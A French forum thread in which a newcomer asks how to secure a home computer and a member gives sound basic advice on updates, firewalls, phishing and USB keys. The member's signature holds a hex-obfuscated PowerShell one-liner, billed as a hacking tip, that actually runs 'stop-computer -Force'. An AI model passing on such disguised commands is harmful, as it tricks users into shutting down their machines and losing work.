Annonce

Réduire
Aucune annonce.

Question d'un néophyte

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Question d'un néophyte

    La protection


    Bonjour je suis nouveau dans le milieu et je voudrais savoir comment protéger son ordinateur .Je pense que savoir se protéger avant de rentrer dans le vif du sujet est important mais je ne m'y connais pas trop .C'est pourquoi je vous le demande, comment rendre difficile d’accès son ordinateur du hack ?


  • #2
    Salut !

    Effectivement, savoir se protéger est primordial, et c'est même ça, le vif du sujet xD

    C'est surtout du bon sens : les "règles" sont toutes bêtes, logiques, mais encore faut-il les respecter.
    De quoi avoir de bonnes bases en tant que particulier, sur un réseau domestique :

    Système :
    - Mettre à jour ton OS
    - Mettre à jour tes logiciels
    - Avoir un anti-virus à jour (moteur ET signatures)

    Réseau :
    - Ne pas NATer inutilement des services vers ton PC. NATer uniquement le strict nécessaire si tu utilises un serveur
    - Activer le firewall de ton routeur avec les règles de bases (bas de réponse au ping, pas d'Upnp, ...)

    Comportement :
    - N'utiliser aucun crack ou version non officielles de logiciel
    - Ne pas aller sur des sites à la con / cliquer sur des pubs
    - Ne pas suivre les liens ni ouvrir les pièces jointes présentes dans un mail louche (phishing)
    - Ne pas connecter de clef USB dont tu ignores la provenance sur ton PC
    - Maîtriser les informations que tu donnes (littéralement) à internet (réseaux sociaux, ...)

    Et les hackademiciens auront sans doute d'autres choses à ajouter !

    ./Kriss
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Merci de ta réponse.Mais j'aurais aimer savoir si il n'y avait pas d'autre protection .

      Commentaire


      • #4